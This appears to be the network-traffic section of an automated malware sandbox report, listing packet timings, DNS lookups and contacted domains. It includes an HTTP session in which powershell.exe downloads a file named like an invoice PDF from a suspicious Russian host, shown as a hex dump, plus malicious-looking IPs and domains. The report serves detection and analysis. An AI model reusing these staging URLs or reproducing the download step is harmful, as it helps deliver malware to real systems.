                                                                                                Dec 18, 2024 09:23:22.539175034 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.539213896 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.540131092 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.540178061 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.540179014 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.541244984 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.541258097 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.541284084 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.542216063 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.542260885 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.542403936 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.543299913 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.543318033 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.543346882 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.544380903 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.544393063 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.544424057 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.545440912 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.545454025 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.545488119 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.546525002 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.546535015 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.546572924 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.596019983 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.603888988 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.603987932 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.604043007 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.604456902 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.604474068 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.604510069 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.605587959 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.605663061 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.605707884 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.606487036 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.606587887 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.606628895 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.607533932 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.607637882 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.607681036 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.608584881 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.608793020 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.608839035 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.609811068 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.609829903 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.609869957 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.662842035 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.662863016 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.662974119 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.663223982 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.663239956 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.663306952 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.663963079 CET804970494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:22.705454111 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:22.882653952 CET4970480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:51.697407007 CET4976680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:51.826138020 CET804976694.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:51.826275110 CET4976680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:51.826559067 CET4976680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:51.826590061 CET4976680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:51.952924967 CET804976694.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:51.955351114 CET804976694.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:53.373068094 CET804976694.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:53.418119907 CET4976680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:53.643529892 CET4977280192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:53.768687963 CET804977294.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:53.768776894 CET4977280192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:53.770353079 CET4977280192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:53.770382881 CET4977280192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:53.895224094 CET804977294.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:53.895240068 CET804977294.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:55.347723007 CET804977294.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:23:55.402514935 CET4977280192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:23:55.723366976 CET4977880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:23:55.849062920 CET8049778109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:23:55.853658915 CET4977880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:23:55.858339071 CET4977880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:23:55.858436108 CET4977880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:23:55.982090950 CET8049778109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:23:55.986536980 CET8049778109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:23:57.193710089 CET8049778109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:23:57.246237040 CET4977880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:24:51.388195038 CET4977880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:24:51.389417887 CET4976680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:24:51.389442921 CET4977280192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:24:51.511085987 CET8049778109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:24:51.511176109 CET804976694.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:24:51.511193991 CET804977294.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:24:51.511307001 CET4976680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:24:51.511331081 CET4977280192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:24:51.511405945 CET4977880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:02.047380924 CET4993080192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:02.167450905 CET804993094.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:02.167984009 CET4993080192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:02.168277979 CET4993080192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:02.168294907 CET4993080192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:02.287970066 CET804993094.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:02.287986040 CET804993094.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:03.517447948 CET804993094.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:03.533292055 CET4993680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:03.621336937 CET4993080192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:03.652915001 CET804993694.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:03.655865908 CET4993680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:03.656486988 CET4993680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:03.659773111 CET4993680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:03.776011944 CET804993694.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:03.779395103 CET804993694.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:05.158297062 CET804993694.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:05.161315918 CET4993880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:05.246393919 CET4993680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:05.281029940 CET8049938109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:25:05.281141996 CET4993880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:05.281310081 CET4993880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:05.281353951 CET4993880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:05.400763988 CET8049938109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:25:05.400934935 CET8049938109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:25:06.609590054 CET8049938109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:25:06.730879068 CET4993880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:07.120266914 CET4993080192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:07.121006966 CET4994480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:07.240323067 CET804993094.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:07.240379095 CET4993080192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:07.240518093 CET804994494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:07.240592957 CET4994480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:07.240746975 CET4994480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:07.240771055 CET4994480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:07.360203028 CET804994494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:07.360304117 CET804994494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:08.512336969 CET4993880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:08.512372971 CET4993680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:08.593101025 CET804994494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:08.598582029 CET4994980192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:08.634340048 CET804993694.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:08.634818077 CET8049938109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:25:08.634864092 CET4993680192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:08.634924889 CET4993880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:08.718199015 CET804994994.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:08.718516111 CET4994980192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:08.719189882 CET4994980192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:08.719211102 CET4994980192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:08.804224968 CET4994480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:08.838675022 CET804994994.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:08.838793039 CET804994994.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:10.238723040 CET804994994.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:10.242382050 CET4995580192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:10.362015009 CET8049955109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:25:10.362099886 CET4995580192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:10.362344980 CET4995580192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:10.362355947 CET4995580192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:10.363496065 CET4994980192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:10.482542038 CET8049955109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:25:10.482556105 CET8049955109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:25:11.708875895 CET8049955109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:25:11.933851957 CET4995580192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:12.739866972 CET4994480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:12.741229057 CET4996180192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:12.860637903 CET804994494.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:12.861681938 CET804996194.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:12.861785889 CET4994480192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:12.861831903 CET4996180192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:12.862088919 CET4996180192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:12.862106085 CET4996180192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:12.982356071 CET804996194.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:12.982527971 CET804996194.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:14.249541044 CET804996194.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:14.264153004 CET4994980192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:14.265625954 CET4996380192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:14.324465990 CET4996180192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:14.384124041 CET804994994.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:14.385174990 CET804996394.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:14.385438919 CET4996380192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:14.385440111 CET4994980192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:14.385567904 CET4996380192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:14.385591030 CET4996380192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:14.505140066 CET804996394.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:14.505239964 CET804996394.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:15.742557049 CET804996394.156.177.51192.168.2.5
                                                                                                Dec 18, 2024 09:25:15.745820045 CET4995580192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:15.748929977 CET4996880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:15.824513912 CET4996380192.168.2.594.156.177.51
                                                                                                Dec 18, 2024 09:25:15.865739107 CET8049955109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:25:15.865869045 CET4995580192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:15.868438959 CET8049968109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:25:15.868535042 CET4996880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:15.868762016 CET4996880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:15.868794918 CET4996880192.168.2.5109.70.26.37
                                                                                                Dec 18, 2024 09:25:15.988383055 CET8049968109.70.26.37192.168.2.5
                                                                                                Dec 18, 2024 09:25:15.988415003 CET8049968109.70.26.37192.168.2.5
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Dec 18, 2024 09:23:17.446424961 CET5881753192.168.2.51.1.1.1
                                                                                                Dec 18, 2024 09:23:17.589493036 CET53588171.1.1.1192.168.2.5
                                                                                                Dec 18, 2024 09:23:33.571760893 CET5045953192.168.2.51.1.1.1
                                                                                                Dec 18, 2024 09:23:51.403476954 CET4946253192.168.2.51.1.1.1
                                                                                                Dec 18, 2024 09:23:51.692503929 CET53494621.1.1.1192.168.2.5
                                                                                                Dec 18, 2024 09:23:53.377954006 CET6154253192.168.2.51.1.1.1
                                                                                                Dec 18, 2024 09:23:53.641870975 CET53615421.1.1.1192.168.2.5
                                                                                                Dec 18, 2024 09:23:55.353418112 CET5280253192.168.2.51.1.1.1
                                                                                                Dec 18, 2024 09:23:55.722100973 CET53528021.1.1.1192.168.2.5
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Dec 18, 2024 09:23:17.446424961 CET192.168.2.51.1.1.10x74e4Standard query (0)spotcarservice.ruA (IP address)IN (0x0001)false
                                                                                                Dec 18, 2024 09:23:33.571760893 CET192.168.2.51.1.1.10xd9d0Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                Dec 18, 2024 09:23:51.403476954 CET192.168.2.51.1.1.10xcddbStandard query (0)constractionscity1991.latA (IP address)IN (0x0001)false
                                                                                                Dec 18, 2024 09:23:53.377954006 CET192.168.2.51.1.1.10xb1c6Standard query (0)restructurisationservice.ruA (IP address)IN (0x0001)false
                                                                                                Dec 18, 2024 09:23:55.353418112 CET192.168.2.51.1.1.10x4565Standard query (0)connecticutproperty.ruA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Dec 18, 2024 09:23:17.589493036 CET1.1.1.1192.168.2.50x74e4No error (0)spotcarservice.ru94.156.177.51A (IP address)IN (0x0001)false
                                                                                                Dec 18, 2024 09:23:33.559721947 CET1.1.1.1192.168.2.50xa1d6No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                Dec 18, 2024 09:23:33.559721947 CET1.1.1.1192.168.2.50xa1d6No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                Dec 18, 2024 09:23:33.813910961 CET1.1.1.1192.168.2.50xd9d0No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Dec 18, 2024 09:23:51.692503929 CET1.1.1.1192.168.2.50xcddbNo error (0)constractionscity1991.lat94.156.177.51A (IP address)IN (0x0001)false
                                                                                                Dec 18, 2024 09:23:53.641870975 CET1.1.1.1192.168.2.50xb1c6No error (0)restructurisationservice.ru94.156.177.51A (IP address)IN (0x0001)false
                                                                                                Dec 18, 2024 09:23:55.722100973 CET1.1.1.1192.168.2.50x4565No error (0)connecticutproperty.ru109.70.26.37A (IP address)IN (0x0001)false
                                                                                                Dec 18, 2024 09:23:55.722100973 CET1.1.1.1192.168.2.50x4565No error (0)connecticutproperty.ru194.85.61.76A (IP address)IN (0x0001)false
                                                                                                • spotcarservice.ru
                                                                                                • waaliasqugu.org
                                                                                                  • constractionscity1991.lat
                                                                                                • qrjxfdbwvthlvm.com
                                                                                                  • restructurisationservice.ru
                                                                                                • hrmdrefrhxsklmy.net
                                                                                                  • connecticutproperty.ru
                                                                                                • ldsjjyyryte.org
                                                                                                • pmgidbasrntuh.org
                                                                                                • yxfqkjutumbric.org
                                                                                                • ttviunnjnhq.net
                                                                                                • oswckeqrobwxxb.org
                                                                                                • mhwsrcytivmhoptq.com
                                                                                                • fouawsejyefgcj.org
                                                                                                • jyqxqlsrlwqxtdg.org
                                                                                                • ifwdryoytskvgy.com
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.54970494.156.177.51806640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:23:17.722626925 CET90OUTGET /fdjskf88cvt/invoce2.pdf HTTP/1.1
                                                                                                Host: spotcarservice.ru
                                                                                                Connection: Keep-Alive
                                                                                                Dec 18, 2024 09:23:20.293288946 CET1236INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:23:20 GMT
                                                                                                Content-Type: application/pdf
                                                                                                Content-Length: 502098
                                                                                                Connection: keep-alive
                                                                                                Last-Modified: Mon, 30 Oct 2017 13:39:36 GMT
                                                                                                ETag: "7a952-55cc3c4f01600"
                                                                                                Accept-Ranges: bytes
                                                                                                Data Raw: 30 83 07 a9 4d 06 09 2a 86 48 86 f7 0d 01 07 02 a0 83 07 a9 3d 30 83 07 a9 38 02 01 01 31 0e 30 0c 06 0a 2a 86 24 02 01 01 01 01 02 01 30 83 07 9a 42 06 09 2a 86 48 86 f7 0d 01 07 01 a0 83 07 9a 32 04 83 07 9a 2d 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 52 47 42 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 38 34 30 2f 46 69 6c 74 65 72 2f 44 43 54 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 37 35 30 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 2f 4c 65 6e 67 74 68 20 31 36 34 34 39 31 3e 3e 73 74 72 65 61 6d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 48 00 48 00 00 ff ed 00 38 50 68 6f 74 6f 73 68 6f 70 20 33 2e 30 00 38 42 49 4d 04 04 00 00 00 00 00 00 38 42 49 4d 04 25 00 00 00 00 00 10 d4 1d 8c d9 8f 00 b2 04 e9 80 09 98 ec f8 42 7e ff c0 00 11 08 03 48 02 ee 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 [TRUNCATED]
                                                                                                Data Ascii: 0M*H=0810*$0B*H2-%PDF-1.7%1 0 obj<</ColorSpace/DeviceRGB/Subtype/Image/Height 840/Filter/DCTDecode/Type/XObject/Width 750/BitsPerComponent 8/Length 164491>>streamJFIFHH8Photoshop 3.08BIM8BIM%B~H"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzCC/?d]<Fso_Is7$sORnc=qvJj*qRTI DR,r
                                                                                                Dec 18, 2024 09:23:20.293334961 CET224INData Raw: 39 fc fa ff 00 9f 67 06 72 ca 0a 9c e7 1c f5 e2 b2 f6 bd 85 c9 62 7c 83 f3 1c b0 5e d8 fc 3f cf 14 ab d5 93 03 8c 60 8a 60 38 8f 03 8f 4c 83 9e 3f 97 a7 3f a1 a5 e3 71 0f 80 57 af e1 db fc fe 95 3e d4 97 1f 22 55 75 70 d8 e8 4f 3c 70 4d 38 e3 60
                                                                                                Data Ascii: 9grb|^?``8L??qW>"UupO<pM8`*G#*~\rsu%,x(uS{yvFJcwRy\=3T9l1wFf19S|9S?j
                                                                                                Dec 18, 2024 09:23:20.293349028 CET1236INData Raw: 94 17 42 3a 12 bc 82 38 00 fb 7f fa e9 eb bc e1 d3 86 1d 4f 51 fd 3b 50 a9 e5 93 93 82 09 c6 0f 1c 7b 8e bc d0 06 f6 d9 90 a5 8f 4c 71 9f f3 db ad 47 b5 40 e0 0d b0 a6 5f 90 e4 02 3a 0e 7d 7f c6 94 39 0a 76 90 47 53 c7 e1 51 10 14 1e 70 33 90 07
                                                                                                Data Ascii: B:8OQ;P{LqG@_:}9vGSQp3p2;ZD+!\@:gjNg9'jT`2';y#$}x5*+n.Hvo#F`Mh`5=:<}9Q[g\g?_\p@:qW`YY t
                                                                                                Dec 18, 2024 09:23:20.293365955 CET1236INData Raw: 14 9c 90 32 48 c7 3c 75 c1 eb ed 47 b4 0e 55 d4 33 f2 70 31 c1 3e bf ce 93 70 03 ae 31 90 78 1f 5e ff 00 ce a3 2a 14 ed 24 1f 7c fb d2 85 62 3e 7c e1 47 42 07 43 d3 1f 9d 3e 7e e3 b2 17 a1 23 ee 95 e7 f0 a6 b3 3e fc 0c 6e 50 71 c6 70 47 a8 cf f9
                                                                                                Data Ascii: 2H<uGU3p1>p1x^*$|b>|GBC>~#>nPqpGi`g:8|c?O5TV[i7`s9p?ja*3Gr]6c5?(*O\{cM]#JC$-=5,p2x}=#8$gK`|)s.tX'
                                                                                                Dec 18, 2024 09:23:20.293376923 CET1236INData Raw: 04 00 dc 8e 01 03 f9 57 83 5b f8 8f 5f 8b c9 78 6e a6 21 81 05 5c 09 23 c0 e4 63 70 e3 f0 fa 7b d7 5f 6d e3 2b d8 95 12 f2 24 79 88 04 80 36 60 8e f9 e7 f4 1f 4a eb a3 9a 42 6a ed 59 19 ba 6d 1e 93 95 73 fb c1 9c e0 64 e1 41 3c fb f1 f9 ff 00 85
                                                                                                Data Ascii: W[_xn!\#cp{_m+$y6`JBjYmsdA<FgtX1qu^/DVzWw@= #<Q=I;9vQ#w=9,3>w92qA$=:4%'<r9\?H#9#:`g?
                                                                                                Dec 18, 2024 09:23:20.293385983 CET1236INData Raw: aa 38 fc 33 ef 46 e6 00 73 c8 cf 20 f3 d2 a3 c9 72 dd f6 ff 00 3e bf e3 4d 27 7e 08 1b 4a e7 05 b8 ef fe 1f a5 17 25 a2 76 20 03 81 8d dd bf 2e 6a 22 48 42 78 c6 70 41 3e bc 71 4c 63 b8 80 73 cf 1c f5 24 7f 5a 8b 23 70 c9 c6 47 bf e3 fe 7f c8 69
                                                                                                Data Ascii: 83Fs r>M'~J%v .j"HBxpA>qLcs$Z#pGi&R^;yC-1a?Y7<p>Z&('uQvyNO&z}sI1:c=Oa-{<R1]=SwY#$N~NK =~j7~` c
                                                                                                Dec 18, 2024 09:23:20.293396950 CET1236INData Raw: 94 42 4b a8 fd db 30 60 78 e0 e4 f0 07 6c 8a 15 55 ec ef 77 d7 fa b0 b9 75 34 ad 27 66 86 36 8f 12 00 b9 ea 4f 27 1c e4 f2 3b f0 7f 1a 64 f1 c9 71 70 27 63 b7 cb 03 00 9f 97 03 9f 9b ae 0e 4f 23 1d 3d 2b 3c 5c 79 0c 15 db 61 2f 8c 0c 6e 20 fc a0
                                                                                                Data Ascii: BK0`xlUwu4'f6O';dqp'cO#=+<\ya/n '`jo+p-3hS#dIY$&rAI{T\\tz5=<Xp;T1&+p78r3@VrNVck6q\;y8ZZ%'
                                                                                                Dec 18, 2024 09:23:20.293479919 CET1236INData Raw: 6e 03 93 ed c7 5f c7 ae 3d a9 ee 52 68 03 1c 05 38 38 e9 dc e4 50 0b 00 d8 18 38 ed ce 7a 74 a4 56 dd 91 96 0a d8 ce 72 33 c1 3d 7b f3 c7 ff 00 aa a2 7d e4 94 5c 85 19 c7 03 38 23 3d b3 fe 79 fa 21 df 4b 93 2b 10 a7 9d c4 74 62 73 ec 33 9f 4f f3
                                                                                                Data Ascii: n_=Rh88P8ztVr3={}\8#=y!K+tbs3OG`5GpiS8r2?\bqAQ.9?jc1@S>Qdc `[RKwe'99x4J*HfQ\gGzVF=nGL?'
                                                                                                Dec 18, 2024 09:23:20.293600082 CET1236INData Raw: f4 fc 2b 9e c0 c7 0c 31 18 39 18 18 ce 0f e7 f8 fe 74 fd 8f 2b 12 48 2d d3 1e d8 c0 fd 38 a4 8d c1 4d a3 93 27 3f 41 c0 fa 7a d4 b1 8e 77 8c ee 3d 33 c7 1f e1 f8 d0 f6 02 45 60 4b 03 8c 10 3a 64 8e 79 38 f4 14 06 11 ae 15 41 ce 3a 9f f0 f4 fc 29
                                                                                                Data Ascii: +19t+H-8M'?Azw=3E`K:dy8A:)y*[>"u?^EIJ\nz9QWvD2G,0zW{:OpL- qNx_%*/kxdARS'u+FC'jB@<M-I(,69
                                                                                                Dec 18, 2024 09:23:20.293611050 CET1236INData Raw: 3d 3e a9 7f 6b a7 e9 f2 33 4a 62 92 40 a4 2b a3 b6 f6 ca 9d 80 aa b0 52 57 3c b6 06 01 e7 ad 6b 3b 6d fd 7f c1 31 a7 52 4b 5b e8 7b 2d 9f 8f 3c 2b 22 ef 9a 71 69 2e ec 11 70 36 ae 33 81 96 fb b8 38 e0 ee e7 ad 74 d6 f7 91 5d a9 9e d9 92 44 7f e3
                                                                                                Data Ascii: =>k3Jb@+RW<k;m1RK[{-<+"qi.p638t]D0ST(Gt8~&N79t^&{-!qc2`'gM-bd>6ebN=NzPG8"!w$~4|5\$d(8A-8lq]~F#{0Wn
